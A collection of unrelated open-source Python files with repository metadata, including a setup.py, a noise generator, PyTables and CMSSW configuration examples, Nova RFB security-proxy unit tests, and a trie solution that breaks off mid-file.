if calls:
rc = rc or 1
for call in calls:
print(
f'{filename}:{call.line}:{call.column}: '
f'replace {call.name}() with {BUILTIN_TYPES[call.name]}',
)
return rc
if __name__ == '__main__':
raise SystemExit(main())
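A small demonstration of the Visitor above on an in-memory snippet; no file on disk is needed.
# Minimal sketch: only the bare dict() call is reported; list('ab') has positional args and
# dict(a=1) has keyword arguments, so both are skipped by visit_Call().
tree = ast.parse("x = dict()\ny = list('ab')\nz = dict(a=1)")
visitor = Visitor()
visitor.visit(tree)
print(visitor.builtin_type_calls)  # [Call(name='dict', line=1, column=4)]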
|
e862fa70f7cc1f43f2f29a5c978aa33e06a1d5d6
|
29eacf3b29753d65d8ec0ab4a60ea1f7ddecbd68
|
/setup.py
|
94d96ef1f119f85d0d5af99f2492c039438445db
|
[
"MIT"
] |
permissive
|
lightly-ai/lightly
|
5b655fe283b7cc2ddf1d7f5bd098603fc1cce627
|
5650ee8d4057139acf8aa10c884d5d5cdc2ccb17
|
refs/heads/master
| 2023-08-17T11:08:00.135920
| 2023-08-16T12:43:02
| 2023-08-16T12:43:02
| 303,705,119
| 2,473
| 229
|
MIT
| 2023-09-14T14:47:16
| 2020-10-13T13:02:56
|
Python
|
UTF-8
|
Python
| false
| false
| 4,985
|
py
|
setup.py
|
import os
import sys
import setuptools
try:
import builtins
except ImportError:
import __builtin__ as builtins
PATH_ROOT = os.path.dirname(__file__)
builtins.__LIGHTLY_SETUP__ = True
import lightly
def load_description(path_dir=PATH_ROOT, filename="DOCS.md"):
"""Load long description from readme in the path_dir/ directory"""
with open(os.path.join(path_dir, filename)) as f:
long_description = f.read()
return long_description
def load_requirements(path_dir=PATH_ROOT, filename="base.txt", comment_char="#"):
"""From pytorch-lightning repo: https://github.com/PyTorchLightning/pytorch-lightning.
Load requirements from text file in the path_dir/requirements/ directory.
"""
with open(os.path.join(path_dir, "requirements", filename), "r") as file:
lines = [ln.strip() for ln in file.readlines()]
reqs = []
for ln in lines:
        # filter out comments
if comment_char in ln:
ln = ln[: ln.index(comment_char)].strip()
# skip directly installed dependencies
if ln.startswith("http"):
continue
if ln: # if requirement is not empty
reqs.append(ln)
return reqs
if __name__ == "__main__":
name = "lightly"
version = lightly.__version__
description = lightly.__doc__
author = "Philipp Wirth & Igor Susmelj"
author_email = "philipp@lightly.ai"
description = "A deep learning package for self-supervised learning"
entry_points = {
"console_scripts": [
"lightly-crop = lightly.cli.crop_cli:entry",
"lightly-train = lightly.cli.train_cli:entry",
"lightly-embed = lightly.cli.embed_cli:entry",
"lightly-magic = lightly.cli.lightly_cli:entry",
"lightly-download = lightly.cli.download_cli:entry",
"lightly-version = lightly.cli.version_cli:entry",
]
}
long_description = load_description()
python_requires = ">=3.6"
base_requires = load_requirements(filename="base.txt")
openapi_requires = load_requirements(filename="openapi.txt")
torch_requires = load_requirements(filename="torch.txt")
video_requires = load_requirements(filename="video.txt")
dev_requires = load_requirements(filename="dev.txt")
setup_requires = ["setuptools>=21"]
install_requires = base_requires + openapi_requires + torch_requires
extras_require = {
"video": video_requires,
"dev": dev_requires,
"all": dev_requires + video_requires,
}
packages = [
"lightly",
"lightly.api",
"lightly.cli",
"lightly.cli.config",
"lightly.data",
"lightly.embedding",
"lightly.loss",
"lightly.loss.regularizer",
"lightly.models",
"lightly.models.modules",
"lightly.transforms",
"lightly.utils",
"lightly.utils.benchmarking",
"lightly.utils.cropping",
"lightly.active_learning",
"lightly.active_learning.config",
"lightly.openapi_generated",
"lightly.openapi_generated.swagger_client",
"lightly.openapi_generated.swagger_client.api",
"lightly.openapi_generated.swagger_client.models",
]
project_urls = {
"Homepage": "https://www.lightly.ai",
"Web-App": "https://app.lightly.ai",
"Documentation": "https://docs.lightly.ai",
"Github": "https://github.com/lightly-ai/lightly",
"Discord": "https://discord.gg/xvNJW94",
}
classifiers = [
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"Intended Audience :: Education",
"Intended Audience :: Science/Research",
"Topic :: Scientific/Engineering",
"Topic :: Scientific/Engineering :: Mathematics",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
"Topic :: Software Development",
"Topic :: Software Development :: Libraries",
"Topic :: Software Development :: Libraries :: Python Modules",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"License :: OSI Approved :: MIT License",
]
setuptools.setup(
name=name,
version=version,
author=author,
author_email=author_email,
description=description,
entry_points=entry_points,
license="MIT",
long_description=long_description,
long_description_content_type="text/markdown",
setup_requires=setup_requires,
install_requires=install_requires,
extras_require=extras_require,
python_requires=python_requires,
packages=packages,
classifiers=classifiers,
include_package_data=True,
project_urls=project_urls,
)
|
4c8f326d74f7e5a7f9fe36b38011fc88c6232d34
|
2dfbca22d0bacf7ba2bb4d270b2d3292f5f8a43b
|
/amulet/level/formats/leveldb_world/interface/chunk/leveldb_25.py
|
38432ed45cc5d1f99909ad87a5a9832264eea27c
|
[] |
no_license
|
Amulet-Team/Amulet-Core
|
9715d888e2faf6c41f9414fd105aaa926aa501c2
|
dafef97fe4fd1f2f713ef1e3503d6b13b20c1c1f
|
refs/heads/main
| 2023-08-18T17:45:48.775423
| 2023-08-16T09:37:55
| 2023-08-16T09:37:55
| 130,729,079
| 117
| 26
| null | 2023-08-16T09:37:57
| 2018-04-23T17:00:04
|
Python
|
UTF-8
|
Python
| false
| false
| 673
|
py
|
leveldb_25.py
|
from __future__ import annotations
import struct
from .leveldb_24 import (
LevelDB24Interface as ParentInterface,
)
class LevelDB25Interface(ParentInterface):
chunk_version = 25
@staticmethod
def _chunk_key_to_sub_chunk(cy: int, min_y: int) -> int:
return cy + min_y
@staticmethod
def _get_sub_chunk_storage_byte(cy: int, min_y: int) -> bytes:
# The chunk db keys all start at 0 regardless of chunk floor position.
# This is the floor position of when the world was created.
# If the floor position changes in the future this will break.
return struct.pack("b", cy - min_y)
export = LevelDB25Interface
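Two quick checks of the helpers above; the floor value of -4 is only an example, not taken from a real world.
# Illustrative checks of the key/sub-chunk conversion (min_y below is an assumption).
assert LevelDB25Interface._get_sub_chunk_storage_byte(-4, -4) == struct.pack("b", 0)
assert LevelDB25Interface._chunk_key_to_sub_chunk(0, -4) == -4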
|
de197ee39eef817704a5936227806c5a45301108
|
09e2c0960db705664881c47cc1c4776289576f04
|
/noisereduce/generate_noise.py
|
d32a0c74bcbb5336d88eff10550660871004e1ad
|
[
"MIT"
] |
permissive
|
timsainb/noisereduce
|
044e5cd513edc04eef8f3cc346e084d2b8fb0a02
|
658b8c61368e2cbc9ed1e86bf71ddf61c77852f0
|
refs/heads/master
| 2023-08-03T09:22:47.124089
| 2023-07-14T03:16:48
| 2023-07-14T03:16:48
| 174,219,582
| 1,066
| 230
|
MIT
| 2023-07-30T18:10:30
| 2019-03-06T20:55:12
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 671
|
py
|
generate_noise.py
|
import numpy as np
# from https://stackoverflow.com/questions/33933842/how-to-generate-noise-in-frequency-range-with-numpy
def fftnoise(f):
    """Return real-valued noise whose Fourier amplitude spectrum is given by f, using random phases."""
f = np.array(f, dtype="complex")
Np = (len(f) - 1) // 2
phases = np.random.rand(Np) * 2 * np.pi
phases = np.cos(phases) + 1j * np.sin(phases)
f[1 : Np + 1] *= phases
f[-1 : -1 - Np : -1] = np.conj(f[1 : Np + 1])
return np.fft.ifft(f).real
def band_limited_noise(min_freq, max_freq, samples=1024, samplerate=1):
freqs = np.abs(np.fft.fftfreq(samples, 1 / samplerate))
f = np.zeros(samples)
f[np.logical_and(freqs >= min_freq, freqs <= max_freq)] = 1
return fftnoise(f)
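An example call, with illustrative parameter values: one second of noise restricted to the 1-2 kHz band at a 44.1 kHz sample rate.
# Example use (parameter values are illustrative).
noise = band_limited_noise(min_freq=1000, max_freq=2000, samples=44100, samplerate=44100)
print(noise.shape, noise.dtype)  # (44100,) float64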
|
ecd714a4c512619cc7d9ad842510b56cae6eed06
|
9c774a31ff1e98a6366e71e54e84ea97e6f050a2
|
/examples/attributes1.py
|
07096d6b2a7ca09aa6e831f45e5127233e57d88c
|
[
"BSD-3-Clause"
] |
permissive
|
PyTables/PyTables
|
65c355d47d68b5e8f4240fc7cc32906c3b6f2eea
|
f3817d7637b465de1a2ab5da9dffd3aba185c331
|
refs/heads/master
| 2023-08-30T02:46:42.212028
| 2023-08-18T05:32:06
| 2023-08-18T05:32:06
| 1,844,194
| 1,076
| 267
|
BSD-3-Clause
| 2023-09-09T06:56:39
| 2011-06-03T19:44:46
|
Python
|
UTF-8
|
Python
| false
| false
| 636
|
py
|
attributes1.py
|
import numpy as np
import tables as tb
# Open a new empty HDF5 file
fileh = tb.open_file("attributes1.h5", mode="w", title="Testing attributes")
# Get the root group
root = fileh.root
# Create an array
a = np.array([1, 2, 4], np.int32)
# Save it on the HDF5 file
hdfarray = fileh.create_array(root, 'array', a, "Integer array")
# Assign user attributes
# A string
hdfarray.attrs.string = "This is an example"
# A Char
hdfarray.attrs.char = "1"
# An integer
hdfarray.attrs.int = 12
# A float
hdfarray.attrs.float = 12.32
# A generic object
hdfarray.attrs.object = {"a": 32.1, "b": 1, "c": [1, 2]}
# Close the file
fileh.close()
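A short follow-up sketch (not part of the original example) that reopens the file and reads the attributes back.
# Reopen the file read-only and retrieve the user attributes stored above.
fileh = tb.open_file("attributes1.h5", mode="r")
arr = fileh.root.array
print(arr.attrs.string, arr.attrs.int, arr.attrs.float)
print(arr.attrs.object["c"])  # [1, 2]
fileh.close()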
|
2d55d6c2f3e6dd7bbd4384f9623dbeacb6c178ab
|
fff196eb22df71d916c8b7113c28c82c0944ecb8
|
/toma/batchsize_cache.py
|
34aee396d0dd748530e6d8f23c2dcf6b155f2d82
|
[
"MIT"
] |
permissive
|
BlackHC/toma
|
4b48f0f0d84394f493bef19671a3ceb8d88698fd
|
10cfe70efaba59ea669c50c0060cfddef65d0b16
|
refs/heads/master
| 2021-05-26T12:04:44.314625
| 2021-04-17T18:37:20
| 2021-04-17T18:37:20
| 254,126,044
| 343
| 9
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,472
|
py
|
batchsize_cache.py
|
import functools
from dataclasses import dataclass
from typing import Optional
import toma.cpu_memory
from toma import stacktrace as tst, torch_cuda_memory as tcm
import weakref
@dataclass
class Batchsize:
value: Optional[int] = None
def set_initial_batchsize(self, initial_batchsize: int):
if not self.value:
self.value = initial_batchsize
def get(self) -> int:
return self.value
def decrease_batchsize(self):
self.value //= 2
assert self.value > 0
class BatchsizeCache:
all_instances = weakref.WeakValueDictionary()
def __init__(self):
stacktrace = tst.get_simple_traceback(2)
BatchsizeCache.all_instances[stacktrace] = self
def get_batchsize(self, initial_batchsize: int) -> Batchsize:
raise NotImplementedError()
@dataclass
class NoBatchsizeCache(BatchsizeCache):
def get_batchsize(self, initial_batchsize: int) -> Batchsize:
return Batchsize(initial_batchsize)
@dataclass
class GlobalBatchsizeCache(BatchsizeCache):
batchsize: Optional[Batchsize] = None
def get_batchsize(self, initial_batchsize: int) -> Batchsize:
if not self.batchsize:
self.batchsize = Batchsize(initial_batchsize)
return self.batchsize
class StacktraceMemoryBatchsizeCache(BatchsizeCache):
LRU_CACHE_SIZE: int = 2 ** 16
MEMORY_GRANULARITY: int = 2 ** 28
TRACK_RAM: bool = True
initial_batchsize: Optional[int]
def __init__(self, lru_cache_size=None):
super().__init__()
self.initial_batchsize = None
@functools.lru_cache(lru_cache_size or StacktraceMemoryBatchsizeCache.LRU_CACHE_SIZE)
def get_batchsize_from_cache(stacktrace, cpu_available_memory, gpu_available_memory):
return Batchsize(self.initial_batchsize)
self.get_batchsize_from_cache = get_batchsize_from_cache
def get_batchsize(self, initial_batchsize: int):
stacktrace = tst.get_simple_traceback(2)
if self.TRACK_RAM:
cpu_available_memory = int(toma.cpu_memory.get_available_cpu_memory() // self.MEMORY_GRANULARITY)
else:
cpu_available_memory = -1
gpu_available_memory = int(tcm.get_cuda_assumed_available_memory() // self.MEMORY_GRANULARITY)
batchsize = self.get_batchsize_from_cache(stacktrace, cpu_available_memory, gpu_available_memory)
batchsize.set_initial_batchsize(initial_batchsize)
return batchsize
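A usage sketch of the GlobalBatchsizeCache defined above, assuming the toma imports resolve; the initial batch size is arbitrary.
# Illustrative only: the first call fixes the batch size, later calls reuse the same object.
cache = GlobalBatchsizeCache()
batchsize = cache.get_batchsize(64)
assert batchsize.get() == 64
batchsize.decrease_batchsize()  # e.g. after an out-of-memory failure
assert cache.get_batchsize(64).get() == 32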
|
8c5af51828fa14b3b9830254fdac0595c20e2771
|
84724b34b3f1e84dc53cbca5f3660590dbc34a9f
|
/nova/tests/unit/console/securityproxy/test_rfb.py
|
17cf8f7c5795e67a2fd07e2fabedad622499a692
|
[
"Apache-2.0"
] |
permissive
|
openstack/nova
|
2c24b64e3677595611715bae6dda14edd3f90a24
|
065c5906d2da3e2bb6eeb3a7a15d4cd8d98b35e9
|
refs/heads/master
| 2023-08-28T15:10:05.126314
| 2023-08-25T20:31:27
| 2023-08-25T20:31:27
| 790,031
| 2,287
| 2,320
|
Apache-2.0
| 2023-07-08T02:10:29
| 2010-07-22T02:04:27
|
Python
|
UTF-8
|
Python
| false
| false
| 10,303
|
py
|
test_rfb.py
|
# Copyright (c) 2014-2016 Red Hat, Inc
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Tests the Console Security Proxy Framework."""
from unittest import mock
from nova.console.rfb import auth
from nova.console.rfb import authnone
from nova.console.securityproxy import rfb
from nova import exception
from nova import test
class RFBSecurityProxyTestCase(test.NoDBTestCase):
"""Test case for the base RFBSecurityProxy."""
def setUp(self):
super(RFBSecurityProxyTestCase, self).setUp()
self.manager = mock.Mock()
self.tenant_sock = mock.Mock()
self.compute_sock = mock.Mock()
self.tenant_sock.recv.side_effect = []
self.compute_sock.recv.side_effect = []
self.expected_manager_calls = []
self.expected_tenant_calls = []
self.expected_compute_calls = []
self.proxy = rfb.RFBSecurityProxy()
def _assert_expected_calls(self):
self.assertEqual(self.expected_manager_calls,
self.manager.mock_calls)
self.assertEqual(self.expected_tenant_calls,
self.tenant_sock.mock_calls)
self.assertEqual(self.expected_compute_calls,
self.compute_sock.mock_calls)
def _version_handshake(self):
full_version_str = "RFB 003.008\n"
self._expect_compute_recv(auth.VERSION_LENGTH, full_version_str)
self._expect_compute_send(full_version_str)
self._expect_tenant_send(full_version_str)
self._expect_tenant_recv(auth.VERSION_LENGTH, full_version_str)
def _to_binary(self, val):
if not isinstance(val, bytes):
val = bytes(val, 'utf-8')
return val
def _expect_tenant_send(self, val):
val = self._to_binary(val)
self.expected_tenant_calls.append(mock.call.sendall(val))
def _expect_compute_send(self, val):
val = self._to_binary(val)
self.expected_compute_calls.append(mock.call.sendall(val))
def _expect_tenant_recv(self, amt, ret_val):
ret_val = self._to_binary(ret_val)
self.expected_tenant_calls.append(mock.call.recv(amt))
self.tenant_sock.recv.side_effect = (
list(self.tenant_sock.recv.side_effect) + [ret_val])
def _expect_compute_recv(self, amt, ret_val):
ret_val = self._to_binary(ret_val)
self.expected_compute_calls.append(mock.call.recv(amt))
self.compute_sock.recv.side_effect = (
list(self.compute_sock.recv.side_effect) + [ret_val])
def test_fail(self):
"""Validate behavior for invalid initial message from tenant.
The spec defines the sequence that should be used in the handshaking
process. Anything outside of this is invalid.
"""
self._expect_tenant_send("\x00\x00\x00\x01\x00\x00\x00\x04blah")
self.proxy._fail(self.tenant_sock, None, 'blah')
self._assert_expected_calls()
def test_fail_server_message(self):
"""Validate behavior for invalid initial message from server.
The spec defines the sequence that should be used in the handshaking
process. Anything outside of this is invalid.
"""
self._expect_tenant_send("\x00\x00\x00\x01\x00\x00\x00\x04blah")
self._expect_compute_send("\x00")
self.proxy._fail(self.tenant_sock, self.compute_sock, 'blah')
self._assert_expected_calls()
def test_parse_version(self):
"""Validate behavior of version parser."""
res = self.proxy._parse_version("RFB 012.034\n")
self.assertEqual(12.34, res)
def test_fails_on_compute_version(self):
"""Validate behavior for unsupported compute RFB version.
We only support RFB protocol version 3.8.
"""
for full_version_str in ["RFB 003.007\n", "RFB 003.009\n"]:
self._expect_compute_recv(auth.VERSION_LENGTH, full_version_str)
ex = self.assertRaises(exception.SecurityProxyNegotiationFailed,
self.proxy.connect,
self.tenant_sock,
self.compute_sock)
self.assertIn('version 3.8, but server', str(ex))
self._assert_expected_calls()
def test_fails_on_tenant_version(self):
"""Validate behavior for unsupported tenant RFB version.
We only support RFB protocol version 3.8.
"""
full_version_str = "RFB 003.008\n"
for full_version_str_invalid in ["RFB 003.007\n", "RFB 003.009\n"]:
self._expect_compute_recv(auth.VERSION_LENGTH, full_version_str)
self._expect_compute_send(full_version_str)
self._expect_tenant_send(full_version_str)
self._expect_tenant_recv(auth.VERSION_LENGTH,
full_version_str_invalid)
ex = self.assertRaises(exception.SecurityProxyNegotiationFailed,
self.proxy.connect,
self.tenant_sock,
self.compute_sock)
self.assertIn('version 3.8, but tenant', str(ex))
self._assert_expected_calls()
def test_fails_on_sec_type_cnt_zero(self):
"""Validate behavior if a server returns 0 supported security types.
This indicates a random issue and the cause of that issues should be
decoded and reported in the exception.
"""
self.proxy._fail = mock.Mock()
self._version_handshake()
self._expect_compute_recv(1, "\x00")
self._expect_compute_recv(4, "\x00\x00\x00\x06")
self._expect_compute_recv(6, "cheese")
self._expect_tenant_send("\x00\x00\x00\x00\x06cheese")
ex = self.assertRaises(exception.SecurityProxyNegotiationFailed,
self.proxy.connect,
self.tenant_sock,
self.compute_sock)
self.assertIn('cheese', str(ex))
self._assert_expected_calls()
@mock.patch.object(authnone.RFBAuthSchemeNone, "security_handshake")
def test_full_run(self, mock_handshake):
"""Validate correct behavior."""
new_sock = mock.MagicMock()
mock_handshake.return_value = new_sock
self._version_handshake()
self._expect_compute_recv(1, "\x02")
self._expect_compute_recv(2, "\x01\x02")
self._expect_tenant_send("\x01\x01")
self._expect_tenant_recv(1, "\x01")
self._expect_compute_send("\x01")
self.assertEqual(new_sock, self.proxy.connect(
self.tenant_sock, self.compute_sock))
mock_handshake.assert_called_once_with(self.compute_sock)
self._assert_expected_calls()
def test_client_auth_invalid_fails(self):
"""Validate behavior if no security types are supported."""
self.proxy._fail = self.manager.proxy._fail
self.proxy.security_handshake = self.manager.proxy.security_handshake
self._version_handshake()
self._expect_compute_recv(1, "\x02")
self._expect_compute_recv(2, "\x01\x02")
self._expect_tenant_send("\x01\x01")
self._expect_tenant_recv(1, "\x02")
self.expected_manager_calls.append(
mock.call.proxy._fail(
self.tenant_sock, self.compute_sock,
"Only the security type 1 (NONE) is supported",
)
)
self.assertRaises(exception.SecurityProxyNegotiationFailed,
self.proxy.connect,
self.tenant_sock,
self.compute_sock)
self._assert_expected_calls()
def test_exception_in_choose_security_type_fails(self):
"""Validate behavior if a given security type isn't supported."""
self.proxy._fail = self.manager.proxy._fail
self.proxy.security_handshake = self.manager.proxy.security_handshake
self._version_handshake()
self._expect_compute_recv(1, "\x02")
self._expect_compute_recv(2, "\x02\x05")
self._expect_tenant_send("\x01\x01")
self._expect_tenant_recv(1, "\x01")
self.expected_manager_calls.extend([
mock.call.proxy._fail(
self.tenant_sock, self.compute_sock,
'Unable to negotiate security with server')])
self.assertRaises(exception.SecurityProxyNegotiationFailed,
self.proxy.connect,
self.tenant_sock,
self.compute_sock)
self._assert_expected_calls()
@mock.patch.object(authnone.RFBAuthSchemeNone, "security_handshake")
def test_exception_security_handshake_fails(self, mock_auth):
"""Validate behavior if the security handshake fails for any reason."""
self.proxy._fail = self.manager.proxy._fail
self._version_handshake()
self._expect_compute_recv(1, "\x02")
self._expect_compute_recv(2, "\x01\x02")
self._expect_tenant_send("\x01\x01")
self._expect_tenant_recv(1, "\x01")
self._expect_compute_send("\x01")
ex = exception.RFBAuthHandshakeFailed(reason="crackers")
mock_auth.side_effect = ex
self.expected_manager_calls.extend([
mock.call.proxy._fail(self.tenant_sock, None,
'Unable to negotiate security with server')])
self.assertRaises(exception.SecurityProxyNegotiationFailed,
self.proxy.connect,
self.tenant_sock,
self.compute_sock)
mock_auth.assert_called_once_with(self.compute_sock)
self._assert_expected_calls()
|
396eaafa2a34b943de12c5630c7be2e7a7eb98aa
|
a5a99f646e371b45974a6fb6ccc06b0a674818f2
|
/L1Trigger/L1TCalorimeter/test/TTbarRelVal_Stage2Test.py
|
8cc14265b76be4b3e36d22cd03a154419cb87b17
|
[
"Apache-2.0"
] |
permissive
|
cms-sw/cmssw
|
4ecd2c1105d59c66d385551230542c6615b9ab58
|
19c178740257eb48367778593da55dcad08b7a4f
|
refs/heads/master
| 2023-08-23T21:57:42.491143
| 2023-08-22T20:22:40
| 2023-08-22T20:22:40
| 10,969,551
| 1,006
| 3,696
|
Apache-2.0
| 2023-09-14T19:14:28
| 2013-06-26T14:09:07
|
C++
|
UTF-8
|
Python
| false
| false
| 3,592
|
py
|
TTbarRelVal_Stage2Test.py
|
# Auto generated configuration file
# using:
# Revision: 1.19
# Source: /local/reps/CMSSW/CMSSW/Configuration/Applications/python/ConfigBuilder.py,v
# with command line options: l1 -s L1 --pileup=NoPileUp --geometry DB --conditions=auto:startup -n 1 --no_exec --filein=/store/mc/Fall13dr/TT_Tune4C_13TeV-pythia8-tauola/GEN-SIM-RAW/tsg_PU40bx25_POSTLS162_V2-v1/00000/007939EF-8075-E311-B675-0025905938AA.root
import FWCore.ParameterSet.Config as cms
process = cms.Process('L1')
# import of standard configurations
process.load('Configuration.StandardSequences.Services_cff')
process.load('SimGeneral.HepPDTESSource.pythiapdt_cfi')
process.load('FWCore.MessageService.MessageLogger_cfi')
process.load('Configuration.EventContent.EventContent_cff')
process.load('SimGeneral.MixingModule.mixNoPU_cfi')
process.load('Configuration.StandardSequences.GeometryRecoDB_cff')
process.load('Configuration.StandardSequences.MagneticField_38T_cff')
process.load('Configuration.StandardSequences.SimL1Emulator_cff')
process.load('Configuration.StandardSequences.EndOfProcess_cff')
process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(10)
)
# Input source
process.source = cms.Source("PoolSource",
secondaryFileNames = cms.untracked.vstring(),
fileNames = cms.untracked.vstring('/store/relval/CMSSW_7_3_0_pre1/RelValTTbar_13/GEN-SIM-DIGI-RAW-HLTDEBUG/PU25ns_PRE_LS172_V15-v1/00000/02CB8872-AC5E-E411-BBFD-02163E008CF5.root'
)
)
process.options = cms.untracked.PSet(
)
# Production Info
process.configurationMetadata = cms.untracked.PSet(
version = cms.untracked.string('$Revision: 1.19 $'),
annotation = cms.untracked.string('l1 nevts:1'),
name = cms.untracked.string('Applications')
)
# Output definition
process.RECOSIMoutput = cms.OutputModule("PoolOutputModule",
splitLevel = cms.untracked.int32(0),
eventAutoFlushCompressedSize = cms.untracked.int32(5242880),
outputCommands = cms.untracked.vstring("keep *"),#process.RECOSIMEventContent.outputCommands,
fileName = cms.untracked.string('L1.root'),
dataset = cms.untracked.PSet(
filterName = cms.untracked.string(''),
dataTier = cms.untracked.string('')
)
)
# Additional output definition
# Other statements
from Configuration.AlCa.GlobalTag import GlobalTag
process.GlobalTag = GlobalTag(process.GlobalTag, 'auto:startup', '')
# enable debug message logging for our modules
process.MessageLogger = cms.Service(
"MessageLogger",
destinations = cms.untracked.vstring(
'detailedInfo',
'critical'
),
detailedInfo = cms.untracked.PSet(
threshold = cms.untracked.string('DEBUG')
),
debugModules = cms.untracked.vstring(
'l1tCaloStage2Layer1Digis',
'l1tCaloStage2Digis'
)
)
# Raw to digi
process.load('Configuration.StandardSequences.RawToDigi_cff')
# upgrade calo stage 2
process.load('L1Trigger.L1TCalorimeter.L1TCaloStage2_PPFromRaw_cff')
process.load('L1Trigger.L1TCalorimeter.l1tStage2CaloAnalyzer_cfi')
# TTree output file
process.load("CommonTools.UtilAlgos.TFileService_cfi")
process.TFileService.fileName = cms.string('l1t.root')
# Path and EndPath definitions
process.L1simulation_step = cms.Path(
process.ecalDigis
+process.hcalDigis
+process.L1TCaloStage2_PPFromRaw
+process.l1tStage2CaloAnalyzer)
process.RECOSIMoutput_step = cms.EndPath(process.RECOSIMoutput)
# Schedule definition
process.schedule = cms.Schedule(process.L1simulation_step,
process.RECOSIMoutput_step)
|
74934da18fd1752ab7ba0a9a21bf103c54256a20
|
cd2d902d506e44f6775f8d0e69eb0de745da013e
|
/tests/integration/standard/test_control_connection.py
|
9d579476d29a77d44cbc98492234a5e98be8fc1c
|
[
"Apache-2.0"
] |
permissive
|
datastax/python-driver
|
5135c3dcd227cfaa664d32ce1e0887e71b0e3878
|
8c41066330eb04c34eff57153ab2eda810844d5f
|
refs/heads/master
| 2023-08-18T22:57:43.761208
| 2023-06-06T21:24:28
| 2023-06-06T21:24:28
| 11,262,602
| 1,256
| 492
|
Apache-2.0
| 2023-09-12T21:25:45
| 2013-07-08T19:02:31
|
Python
|
UTF-8
|
Python
| false
| false
| 4,785
|
py
|
test_control_connection.py
|
# Copyright DataStax, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
#
#
#
from cassandra import InvalidRequest
import unittest
from cassandra.protocol import ConfigurationException
from tests.integration import use_singledc, PROTOCOL_VERSION, TestCluster, greaterthanorequalcass40, notdse
from tests.integration.datatype_utils import update_datatypes
def setup_module():
use_singledc()
update_datatypes()
class ControlConnectionTests(unittest.TestCase):
def setUp(self):
if PROTOCOL_VERSION < 3:
raise unittest.SkipTest(
"Native protocol 3,0+ is required for UDTs using %r"
% (PROTOCOL_VERSION,))
self.cluster = TestCluster()
def tearDown(self):
try:
self.session.execute("DROP KEYSPACE keyspacetodrop ")
except (ConfigurationException, InvalidRequest):
# we already removed the keyspace.
pass
self.cluster.shutdown()
def test_drop_keyspace(self):
"""
Test to validate that dropping a keyspace with user defined types doesn't kill the control connection.
Creates a keyspace, and populates with a user defined type. It then records the control_connection's id. It
will then drop the keyspace and get the id of the control_connection again. They should be the same. If they are
not dropping the keyspace likely caused the control connection to be rebuilt.
@since 2.7.0
@jira_ticket PYTHON-358
@expected_result the control connection is not killed
@test_category connection
"""
self.session = self.cluster.connect()
self.session.execute("""
CREATE KEYSPACE keyspacetodrop
WITH replication = { 'class' : 'SimpleStrategy', 'replication_factor': '1' }
""")
self.session.set_keyspace("keyspacetodrop")
self.session.execute("CREATE TYPE user (age int, name text)")
self.session.execute("CREATE TABLE mytable (a int PRIMARY KEY, b frozen<user>)")
cc_id_pre_drop = id(self.cluster.control_connection._connection)
self.session.execute("DROP KEYSPACE keyspacetodrop")
cc_id_post_drop = id(self.cluster.control_connection._connection)
self.assertEqual(cc_id_post_drop, cc_id_pre_drop)
def test_get_control_connection_host(self):
"""
Test to validate Cluster.get_control_connection_host() metadata
@since 3.5.0
@jira_ticket PYTHON-583
@expected_result the control connection metadata should accurately reflect cluster state.
@test_category metadata
"""
host = self.cluster.get_control_connection_host()
self.assertEqual(host, None)
self.session = self.cluster.connect()
cc_host = self.cluster.control_connection._connection.host
host = self.cluster.get_control_connection_host()
self.assertEqual(host.address, cc_host)
self.assertEqual(host.is_up, True)
# reconnect and make sure that the new host is reflected correctly
self.cluster.control_connection._reconnect()
new_host = self.cluster.get_control_connection_host()
self.assertNotEqual(host, new_host)
@notdse
@greaterthanorequalcass40
def test_control_connection_port_discovery(self):
"""
Test to validate that the correct port is discovered when peersV2 is used (C* 4.0+).
Unit tests already validate that the port can be picked up (or not) from the query. This validates
it picks up the correct port from a real server and is able to connect.
"""
self.cluster = TestCluster()
host = self.cluster.get_control_connection_host()
self.assertEqual(host, None)
self.session = self.cluster.connect()
cc_endpoint = self.cluster.control_connection._connection.endpoint
host = self.cluster.get_control_connection_host()
self.assertEqual(host.endpoint, cc_endpoint)
self.assertEqual(host.is_up, True)
hosts = self.cluster.metadata.all_hosts()
self.assertEqual(3, len(hosts))
for host in hosts:
self.assertEqual(9042, host.broadcast_rpc_port)
self.assertEqual(7000, host.broadcast_port)
|
2214bc30a65678556b0c832da1999f7a1c5f182b
|
899a427a903148d0d26e903faf8021b94b126911
|
/23-trie/python/0720-longest-word-in-dictionary(看不懂的解答).py
|
2228090bcdf7ec6202aaabe13a66253579ff8765
|
[
"Apache-2.0"
] |
permissive
|
liweiwei1419/LeetCode-Solutions-in-Good-Style
|
033ab69b93fa2d294ab6a08c8b9fbcff6d32a178
|
acc8661338cc7c1ae067915fb16079a9e3e66847
|
refs/heads/master
| 2022-07-27T15:24:57.717791
| 2021-12-19T03:11:02
| 2021-12-19T03:11:02
| 161,101,415
| 2,016
| 351
|
Apache-2.0
| 2022-01-07T10:38:35
| 2018-12-10T01:50:09
|
Java
|
UTF-8
|
Python
| false
| false
| 1,450
|
py
|
0720-longest-word-in-dictionary(看不懂的解答).py
|
from typing import List
class Node:
def __init__(self, key, is_end=False):
self.key = key
self.children = {}
self.is_end = is_end
class Trie:
def __init__(self):
self.root = Node('')
self.root.is_end = True
def insert(self, word):
node = self.root
for alpha in word:
if alpha not in node.children:
node.children[alpha] = Node(alpha)
node = node.children[alpha]
